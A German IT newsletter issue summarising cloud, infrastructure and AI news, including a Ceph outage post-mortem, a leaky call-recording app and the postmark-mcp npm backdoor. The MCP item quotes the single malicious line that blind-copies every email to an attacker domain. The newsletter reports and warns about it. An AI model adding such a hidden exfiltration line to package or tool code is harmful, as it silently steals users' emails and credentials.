Willkommen zu allesnurgecloud.com – Ausgabe #206
In dieser Woche war ich auf der Bits & Pretzels in München und komme mit vielen Eindrücken zurück. Auch wenn das Networking Event auf dem Event am Mittwoch auf Oktoberfest ausgefallen ist, war es doch eine interessante Konferenz – vor allem mit vielen Gesprächen, neuen Kontakten und alten Bekannten.
Irgendwie bin ich die Woche wieder über meine „erste Flatrate“, den „Naked eye Internetsommer“ aus dem Jahr 1999 gestolpert – 100DM für 100 Stunden im Monat, heute kaum vorstellbar, das war auch noch Prepaid für ein 1 Jahr, wenn ich es richtig im Kopf habe.
Falls du selbst über interessante Artikel stolperst, schick mir einfach einen kurzen Hinweis als Antwort auf diese Mail – danke!
Happy Bootstrapping Podcast
In dieser Woche war Martin Höller bei Happy Bootstrapping zu Gast. In Folge 141 erzählt er von seinem Weg vom Freelancer zum Vollzeit Indie Hacker. Den meisten Umsatz macht er mit der „InYourFace“ App für macOS, die dich einfach an das nächste Meeting erinnert. Gibt es nun auch für iOS. Interessant, wie man mit einfachen Lösungen eine Grundlage schaffen kann. Für mich neu war das steuerliche Willkommensgeschenk für Gründer:innen in Italien – sowas könnten wir in Deutschland auch gebrauchen. Folge 141 jetzt anhören (Spotify / Apple).
Übrigens kannst Du meine Arbeit nun auf Patreon supporten, mir ein Bier ausgeben oder mal auf meiner Amazon-Wunschliste vorbeischauen – Danke! Falls du Interesse hast, im Newsletter oder Podcast Werbung zu buchen, kannst du das auf passionfroot machen.
allesnurgecloud.com ist ein kuratierter Newsletter mit Inhalten aus der Open-Source, Cloud und IT-Welt.
Für weiteren Content folge mir gerne auf Twitter, Mastodon oder LinkedIn.
Möchtest du den Newsletter wöchentlich per E-Mail erhalten?
Einfach hier abonnieren:
Microsoft-Cloud: Daten fließen in 105 Länder ab
Neue Dokumente aus Schottland enthüllen das Ausmaß von Microsofts globalem Datenzugriff. Laut einem Informationsfreiheitsgesuch können schottische Polizeidaten aus über 105 Ländern abgerufen werden – darunter auch von Großbritannien als „feindlich“ eingestufte Staaten wie China.
Laut der Analyse haben Microsoft-Mitarbeiter und 148 Subunternehmer in 105 Staaten potenziell Zugriff auf die Daten. Diese Information ist zwar theoretisch auf „Microsoft Learn“ dokumentiert, aber über schwer auffindbare, nicht zentral verlinkte Dokumente verstreut – ein „Verstecken in aller Öffentlichkeit“, wie Experten kritisieren.
Microsoft räumt ein: Keine Datenhoheit garantierbar
Das ist keine neue Erkenntnis – schon in Ausgabe 198 berichtete ich über Microsofts Eingeständnis vor dem französischen Senat, dass Datensouveränität grundsätzlich nicht gesichert werden könne. Die aktuelle Enthüllung zeigt aber das konkrete Ausmaß: Es geht nicht nur um US-Zugriffe, sondern um ein weltweites Netzwerk von Zugriffsberechtigten. Bei 148 Subunternehmen – wer würde da nicht die Übersicht verlieren 🙂
Bill McCluggage, ehemaliger IT-Sicherheitschef der britischen Regierung, warnt: Solange Microsoft Daten global verteilt, bleibt unklar, wer wann auf sensible Informationen zugreifen kann. Für die betroffenen Polizeibehörden bedeutet das erhebliche rechtliche Risiken – Bürger könnten Schadenersatz einklagen, da schon die begründete Sorge über unrechtmäßige Datenflüsse als Grundlage für Entschädigungen gilt.
Microsoft verweist auf die Einhaltung aller Gesetze, ohne die Vorwürfe zu bestreiten. Das Unternehmen argumentiert weiterhin mit seiner „EU Data Boundary“, kann aber offensichtlich keine echte Kontrolle über Datenflüsse garantieren. Die Realität zeigt: Fremde Cloud-Infrastrukturen sind für sensible Behördendaten schlicht ungeeignet.
Daten in Microsofts Cloud bleiben mitnichten in gewünschter Region
Meltcloud: Bare-Metal-Server zu Kubernetes-Workern mit UKI
Nach der Analyse der vier harten Probleme bei Bare-Metal-Kubernetes zeigt Meltcloud nun ihre Lösung für das Problem: Wie man physische Server in Kubernetes-Worker verwandelt – mit Unified Kernel Images (UKI) und Cloud-nativen Prinzipien.
Das Problem mit traditionellen Ansätzen
Bare-Metal-Kubernetes klingt erstmal simpel: OS installieren, Container-Runtime konfigurieren, Kubelet starten, Cluster joinen. In der Praxis führt das zu Configuration Drift, verpassten Patches und schmerzhafter Fehlersuche. Cloud-Umgebungen lösen das mit Golden Images und Immutability – auf Bare Metal fehlt diese Abstraktion.
Meltcloud packt das komplette Linux-OS in eine einzelne EFI-Binary:
- Flatcar Linux als Basis (läuft komplett aus der Ramdisk)
- Kernel, initrd und Kubelet-Komponenten in einem UKI gebündelt
- Machine-spezifische Konfiguration als UKI-Addon eingebettet
- Resultat: Ein USI (Unified System Image) mit OS + Config
Der Clou: Server bootet direkt in den operativen Kubernetes-State – keine weiteren Provisioning-Schritte nötig.
Statt auf unzuverlässige BMC-APIs zu setzen (vendor-spezifisch, partial features), nutzt Meltcloud den bewährten Weg: Boot von Live-ISO. Egal ob USB-Stick, BMC Virtual Media oder UEFI HTTP Boot – die ISO installiert systemd-boot und die USI auf die ESP-Partition.
Atomare Updates mit Rollback
Updates sind nur das Schreiben einer neuen USI auf die ESP-Partition. Systemd-boot’s Automatic Boot Assessment ermöglicht automatisches Rollback bei fehlgeschlagenen Boots. Keine In-Place-Änderungen, keine Überraschungen.
Bare-Metal-Worker verhalten sich somit wie Container: immutable, stateless, einfach zu ersetzen. Die Komplexität von Firmware-Updates, OS-Patches und Kubernetes-Versionen verschwindet hinter einem simplen Image-Update-Mechanismus. Day-2-Operations werden zu einem git push und einem Image-Build.
Finde den Ansatz super spannend: Man kann also Cloud-Native-Prinzipien bis zur Hardware-Ebene durchziehen – ohne den Overhead einer Virtualisierungsschicht. Vermutlich kann man das sogar schick automatisieren und ein Canary Deployment der Nodes und neuer Versionen machen. Coole Sache!
From Metal to Kubernetes Worker
Anzeige
Cloud Exit mit „We Manage“ – 80 % Kosten gespart bei Everysize.com
Als everysize mit seiner Cloud-Infrastruktur an Grenzen stieß, fand das Unternehmen in We Manage den idealen Partner.
Das Ergebnis: 80% Kostenreduktion bei gleichzeitiger Leistungssteigerung.
„Der Profi-Sysadmin, den ich inhouse bräuchte, der aber bei mir zu wenig zu tun hätte,“ beschreibt Mitgründer Eugen Falkenstein treffend die Rolle von We Manage für sein Unternehmen.
Durch maßgeschneiderte IT-Operations, 24/7-Monitoring und Cloud-Migration befreite sich everysize vom teuren AWS-Vendor-Lock-in. Die Serverkosten sanken von 50.000 auf nur 10.000 Euro jährlich – bei höherer Zuverlässigkeit und Agilität.
Brauchst du Hilfe bei Cloud-Optimierung oder IT-Operations?
Lies die vollständige Case Study und erfahre, wie auch dein Unternehmen von We Manage profitieren kann – buch dir jetzt einen Termin zum Kennenlernen.
zur Case Study: Warum everysize die AWS Public Cloud hinter sich lässt
A16z AI Spending Report analysiert AI Ausgaben
Der Wagniskapitalgeber Andreessen Horowitz und Mercury analysierten die AI-Ausgaben von 200.000+ Startups.
Wenig überraschend: OpenAI (#1) und Anthropic (#2) dominieren. Spannender ist Platz 3: Replit schlägt alle anderen Tools. Die Vibe-Coding-Revolution ist real mit Cursor (#6), Lovable (#18) und Emergent (#48).
60% horizontal, 40% vertikal
Creative Tools wie Canva und Midjourney sind keine Design-Team-Exklusivität mehr – jeder wird zum Creator. Bei Meeting-Tools herrscht Fragmentierung: Otter.ai, Read AI und HappyScribe teilen sich den Markt ohne klaren Gewinner.
Copilots statt Agents
Von 17 vertikalen AI-Tools sind 12 „Human Augmentors“. Nur fünf positionieren sich als autonome „AI Employees“ (Crosby Legal, Cognition, 11x). Die beliebtesten Vertikalen: Customer Service, Sales/GTM und Recruiting.
Lovable dominiert Consumer-Traffic, aber Replit generiert 15x mehr Revenue bei Startups. Der Grund: Enterprise-Features, Datenbanken, Authentication. Lovable bleibt beim UI-Prototyping. Von Traffic alleine kann man sich nichts kaufen.
70% der Tools brauchen keine Enterprise-License. Consumer-Apps werden „in Rekordzeit ins Enterprise gezogen“. Olivia Moore (a16z): „Was früher Consultancies waren, sind jetzt Software-Companies im AI-Zeitalter.“
Aktuell zeigt sich, dass die Startups und Consumer wild experimentieren , es gibt keinen Gewinner pro Kategorie. Die Agent-Revolution steht noch aus – aktuell dominieren Copilots. Gefühlt sind wir noch immer erst am Anfang der ganzen AI revolution und mir ist grad nicht klar, wo die Reise hingeht.
The AI Application Spending Report: Where Startup Dollars Really Go
Jeff Geerlings $3000 Pi-Cluster-Fazit
Nach zwei Jahren Wartezeit auf die Compute Blades testete Jeff Geerling einen 10-Node Raspberry Pi Cluster für $3000 – mit ernüchternden Ergebnissen. Die 10x CM5 16GB Module (160GB RAM total) sollten AI-Workloads bewältigen.
Benchmark-Ernüchterung
Bei HPL erreichte der Cluster 325 Gflops – das ist 4x langsamer als sein $8000 Framework Desktop Cluster bei halbem Preis. Die Energieeffizienz war minimal besser (2.5 vs 2.34 Gflops/Watt), aber der Preis pro Gflop schlechter ($9.23 vs $5.73).
Die AI-Performance enttäuschte komplett: Keine GPU-Beschleunigung möglich, da llama.cpp kein Vulkan auf Pi 5 unterstützt. Ein Llama 3.2:3B Modell schafft 6 Tokens/Sekunde auf einem einzelnen Pi. Das große Llama 3.3:70B über alle Nodes verteilt erreicht nur 0.28 Tokens/Sekunde – 25x langsamer als der Framework Cluster.
Geerling musste das Cluster dreimal neu aufbauen:
- Erste Runde: Random SSDs waren unzuverlässig
- Zweite Runde: Nach SSD-Tausch throttelten die CM5s unter Last
- Dritte Runde: Heatsinks mussten verschraubt werden (poppten sonst ab)
Die einzigen realen Use Cases sieht er in CI/CD-Jobs oder High-Security Edge-Deployments, wo physische Node-Trennung Pflicht ist. Unredacted Labs nutzt Pi-Cluster erfolgreich für Tor Exit Relays.
„This is not the cluster you’re looking for“ – außer maximale Node-Dichte bei minimaler Power ist entscheidend. Für 99% der Anwendungsfälle gibt’s bessere Alternativen. Die Compute Blade bleibt wie die Blade-Filmreihe ein Kult-Klassiker statt Mainstream-Hit.
I regret building this $3000 Pi AI cluster
Supabase und Dash0 sichern sich Mega-Funding
Die AI-Boom-Welle trägt weiter: Supabase erreicht eine $5 Milliarden Bewertung nach einer $100M Series E von Accel und Peak XV. Das Open-Source Backend-as-a-Service profitiert massiv von AI-Coding-Assistenten – über 4 Millionen Entwickler nutzen die PostgreSQL-basierte Plattform bereits.
Gegründet 2020 von Paul Copplestone und Ant Wilson, hat Supabase nun über $500M Funding eingesammelt. Die Bewertung hat sich seit der Series D vor wenigen Monaten mehr als verdoppelt (von $2B auf $5B). Zu den Kunden gehören PwC, McDonald’s und GitHub Next. Coding-Plattformen wie Lovable und Bolt laufen komplett auf Supabase.
Der Firebase-Killer wächst rasant – und hat sich Vitess-Mitgründer Sugu Sougoumarane geholt, um die Skalierung voranzutreiben. Besonders clever: Die Community kann beim Funding co-investieren.
Dash0: AI-native Observability
Parallel sichert sich Dash0 eine $35M Series A, ebenfalls von Accel und Cherry Ventures geleitet. Gründer Mirko Novakovic (zuvor Instana) will das „kaputte“ Observability-Ökosystem revolutionieren.
Der Kern: Agent0, ein SRE AI-Copilot basierend auf dem proprietären SIFT-Framework (Spam Filter, Ingest, Filter, Triage). Statt nur Probleme zu erkennen, hilft Agent0 bei der Remediation – vollständig AI-nativ und auf OpenTelemetry-Standards basierend.
Mit 270 Kunden in 9 Monaten und transparenter Preisgestaltung positioniert sich Dash0 gegen Datadog, Dynatrace und New Relic. Harry Nelis von Accel: „Ihre Momentum in weniger als einem Jahr ist beeindruckend.“
Über 50% aller VC-Deals 2025 gehen laut PitchBook an AI-Startups. Die Infrastructure-Layer profitieren besonders: Supabase als Backend für AI-Apps, Dash0 als Intelligence-Layer für deren Betrieb. Beide setzen auf Open Source und Standards statt Vendor-Lock-in – ein klarer Trend im Enterprise-Bereich.
Database startup Supabase valued at $5 billion in funding led by Accel, Peak XV
CEPH 6 Tage Totalausfall beim Hoster INWX
INWX hat einen ihrer schwersten Ausfälle der letzten 10 Jahre öffentlich dokumentiert. Am 3. September führte ein Routine-Upgrade von Ceph 18 auf 19 zu einem sechstägigen Hosting-Ausfall. Die Ursache: Ein Bug in Ceph, der beim Reduzieren der Metadaten-Server zum Totalcrash führte.
Das Setup: 6 physische Server mit je 12 HDDs/SSDs, verteilt auf zwei Rechenzentren, bilden die Basis für Web- und Mail-Hosting via CephFS sowie VMs über RBD. Beim geplanten Upgrade nach offizieller Dokumentation passierte das Undenkbare:
- 17:30 Uhr: MDS-Server fallen aus, Teile des CephFS nicht mehr erreichbar
- Reparaturversuch schlägt fehl, 3 von 7 Monitoren sterben
- Verbleibende Monitore verlieren Quorum = komplette Handlungsunfähigkeit
Der Bug: Beim Reduzieren der MDS-Anzahl greift der Ceph-Monitor auf eine leere Datenstruktur zu und crasht. Croit meldete den Fehler einen Tag später als Pull-Request #65413 an Ceph.
INWX holte die Ceph-Spezialisten von croit GmbH dazu. Diese entwickelten gepatchte Monitor-Binaries, die den Cluster am 4. September wieder quorate machten. CephFS blieb tot. Erst am 9. September – nach einer „potentiell destruktiven Disaster-Recovery-Prozedur“ mit modifizierten Binaries – war CephFS wieder mountbar.
Das Wunder: Kein Datenverlust. Die Backups waren 48 Stunden alt, aber durch cleveres Zusammenführen (rsync, rdfind für Duplikate) konnten alle Mails und Daten wiederhergestellt werden.
INWX zieht harte Konsequenzen:
- Abschied von CephFS – Umstellung auf ZFS und NFS bereits erfolgt
- Stündliche statt nur tägliche Snapshots dank ZFS
- Mehrere Cluster statt einem zentralen System
- Partner wie croit sind unverzichtbar bei kritischer Infrastruktur
Die bittere Erkenntnis: Ceph-Monitore bieten bei Ausfall kaum Recovery-Optionen. Ein einziger Konfigurationsfehler kann das gesamte System lahmlegen. INWX kommunizierte während des Ausfalls über ihre Statusseite, räumt aber ein: Die Formulierungen waren zu vorsichtig, technische Details hätten früher genannt werden müssen.
Das Positive: Der Bug fließt direkt in Cephs Weiterentwicklung ein. Und INWX hat bewiesen, dass transparente Post-Mortems Vertrauen schaffen – auch wenn’s weh tut.
Wenn das Speichersystem streikt – Rückblick auf unseren Ceph-Incident
Neon – Money Talks: Für 15 Cent zur Datenschutz Katastrophe
Die App „Neon – Money Talks“ stürmte letzte Woche auf Platz 4 der US-iPhone-Charts. Das Geschäftsmodell: Telefonate aufzeichnen, 15 Cent pro Minute kassieren. Die Aufnahmen sollten anonymisiert für KI-Training verkauft werden.
TechCrunch deckte auf: App installieren, Network-Sniffer anwerfen – schon hatte man Zugriff auf alle Aufnahmen aller Nutzer. Die App übertrug Audio-URLs und Transkripte im Klartext. Keine Authentifizierung, kein Passwortschutz.
Durch simple URL-Manipulation waren abrufbar:
- Alle aktuellen Aufnahmen
- Telefonnummern der Beteiligten
- Komplette Gesprächstranskripte
Um Abhörgesetze zu umgehen, zeichnet Neon nur den lokalen Ton auf. Nutzen beide Gesprächspartner Neon, gibt’s das volle Telefonat und 30 Cent pro Minute. In den AGBs sicherte sich Neon Mobile das Recht, alle Aufnahmen öffentlich bereitzustellen.
Nach der Enthüllung nahm Gründer Alex Kiam die Server offline – erwähnte aber nicht die bereits erfolgte Datenpanne. Die App bleibt in beiden App-Stores gelistet.
Der verzweifelte Hunger nach KI-Trainingsdaten führt zu grotesken Geschäftsmodellen. Nutzer verkaufen ihre Privatsphäre für 15 Cent pro Minute – und bekommen nicht mal die versprochene Anonymität. Ein Lehrstück über die Monetarisierung persönlicher Daten im KI-Zeitalter.
Abhör-App Neon verriet alles: Offline
MCP Backdoor in Postmark stiehlt E-Mails
Koi Security hat die weltweit erste dokumentierte Supply-Chain-Attacke auf Model Context Protocol (MCP) Server entdeckt. Das npm-Paket postmark-mcp
– wöchentlich 1.500 mal heruntergeladen – kopiert seit Version 1.0.16 heimlich alle E-Mails an den Entwickler.
Die perfide Masche
Der Angriff ist erschreckend simpel. Ein scheinbar legitimer Entwickler aus Paris mit echtem Namen und GitHub-Profil veröffentlichte 15 saubere Versionen seines MCP-Servers für Postmark-Integration. Entwickler empfahlen das Tool ihren Teams, es wurde Teil täglicher Workflows.
Dann kam Version 1.0.16 – mit genau einer zusätzlichen Zeile Code:
javascript
bcc: "phan@giftshop.club"
Jede E-Mail bekommt seitdem einen blinden Kopierer. Passwort-Resets, Rechnungen, interne Memos – alles landet bei giftshop.club
, einer anderen Domain des Entwicklers.
MCP-Server sind nicht wie normale npm-Pakete. Sie sind Tools für AI-Assistenten mit God-Mode-Permissions: E-Mail-Zugriff, Datenbank-Verbindungen, API-Berechtigungen. Die AI nutzt sie hunderte Male täglich – vollautomatisch, ohne Prüfung.
Das Erschreckende daran: Es gibt kein wirkliches Sicherheitsmodell. Keine Sandbox, keine Containment, nichts. Die AI kann die BCC-Manipulation nicht erkennen. Sie sieht nur: E-Mail senden – Erfolg. Währenddessen fließen 3.000 bis 15.000 E-Mails täglich zu giftshop.club.
Der Angreifer nutzte klassisches Impersonation: Er kopierte den legitimen Code vom offiziellen Postmark-GitHub, fügte seine BCC-Zeile hinzu und publizierte unter gleichem Namen auf npm. Nach der Entdeckung löschte er das Paket – aber die installierten Versionen senden weiter.
Security-Teams fokussieren sich auf traditionelle Bedrohungen, während Entwickler eigenständig AI-Tools mit MCP-Servern adoptieren. Diese operieren komplett außerhalb etablierter Security-Perimeter: Sie tauchen in keinem Asset-Inventar auf, überspringen Vendor-Risk-Assessments und umgehen alle Kontrollen von DLP bis E-Mail-Gateways.
Betroffene sollten das Paket sofort entfernen und alle per E-Mail versendeten Credentials rotieren.
Aber die größere Frage bleibt: Wie viele andere MCP-Server sind bereits kompromittiert? Bei der aktuellen Architektur – ohne Verifikation, ohne Sandboxing – ist es nur eine Frage der Zeit bis zur nächsten Backdoor.
First Malicious MCP in the Wild: The Postmark Backdoor That’s Stealing Your Emails
Schmunzelecke
Hier kannst du in der Browser URL Snake spielen – ja, richtig gelesen. Ich hab es auch erstmal nicht gecheckt, aber klick einfach auf das Fragezeichen, dann siehst du auch die Schlange in der URL. 8 Punkte hab ich dann im ersten Versuch geschafft, also nachdem ich es kapiert habe.
Du?
Und hiermit kannst du MLB Games im Terminal anschauen – erinnert an die gute, alte BTX Zeit. Mal schauen, wann es das für Fußball gibt.
💡 Link Tipps aus der Open Source Welt
toolbrew – Kostenlose Online-Tools Collection
toolbrew ist eine umfangreiche Sammlung kostenloser Online-Tools für verschiedene Alltags- und Entwickler-Aufgaben. Die Plattform bietet über 20 verschiedene Werkzeuge in Kategorien wie Text-Verarbeitung, Video-Downloads, SEO-Analyse und Dokumenten-Konvertierung.
Highlights aus der Tool-Sammlung:
Text & Encoding Tools:
- Case Convert – Text in verschiedene Schreibweisen konvertieren (Title Case, Sentence Case, etc.)
- Word Count – Wörter und Zeichen in Echtzeit zählen
- Base64 Converter – Text zu/von Base64 enkodieren
- Text to Binary – Text in Binärcode umwandeln
Video & Media Downloader:
- YouTube Video Downloader – YouTube Videos als MP4 herunterladen
- YouTube to MP3 – YouTube Videos in MP3 konvertieren
- TikTok Downloader – TikTok Videos mit/ohne Wasserzeichen speichern
- Facebook Video Downloader – Facebook Videos und Watch-Content downloaden
SEO & Web Tools:
- Spam Score Checker – Domain Spam-Score und E-Mail-Reputation prüfen
- Open Graph Generator – Meta-Tags für Social Media erstellen
Weitere nützliche Tools:
- Hours Calculator – Arbeitszeiten und Zeitdifferenzen berechnen
- Plagiarism Checker – Text auf Duplikate prüfen
- PDF to ZIP – Mehrere PDFs in ZIP-Archiv komprimieren
Die Community kann neue Tools vorschlagen – aktuell gewünscht sind unter anderem ein QR-Code Generator, ePub zu PDF Converter und verschiedene Audio-Format-Konverter.
Immich – Self-Hosted Photo and Video Management
Immich ist eine Open-Source Alternative zu Google Photos für selbst-gehostete Foto- und Video-Verwaltung. Nach fast 4 Jahren Entwicklung hat das Projekt mit v2.0.0 seinen ersten Stable Release erreicht. Im Juli 2023 hab ich in Ausgabe 110 schon mal darüber berichtet, es aber selber nie ausprobiert – du vielleicht?
Features:
- Automatische Backup von Fotos/Videos vom Smartphone
- KI-gestützte Gesichtserkennung und Objektsuche
- Interaktive Karte mit Geo-Tagging
- Multi-User Support mit Sharing-Funktionen
- Timeline-Ansicht und Album-Organisation
- Mobile Apps (iOS/Android) und Web-Interface
- Machine Learning für Smart Search
- Live Photos und RAW-Format Support
Mit dem Stable Release folgt Immich nun Semantic Versioning, was bedeutet dass Mobile App v2.x.x mit allen Server-Versionen v2.x.x kompatibel bleibt. Das Team plant zukünftig zusätzliche Services wie end-to-end verschlüsselte Off-Site Backups anzubieten.
Immich wird von FUTO unterstützt und finanziert sich über optionale Product Keys und einen Merch-Store. Die Software bleibt komplett Open Source ohne Paywall-Features.
v2.0.0 – Stable Release of Immich
❓ Feedback & Newsletter Abo
Vielen Dank, dass du es bis hierhin geschafft hast!
Kommentiere gerne oder schicke mir Inhalte, die du passend findest.
Falls dir die Inhalte gefallen haben, kannst du mir gerne auf Twitter folgen.
Gerne kannst du mir ein Bier ausgeben oder mal auf meiner Wunschliste vorbeischauen – Danke!
Möchtest du den Newsletter wöchentlich per E-Mail erhalten?
Einfach hier abonnieren: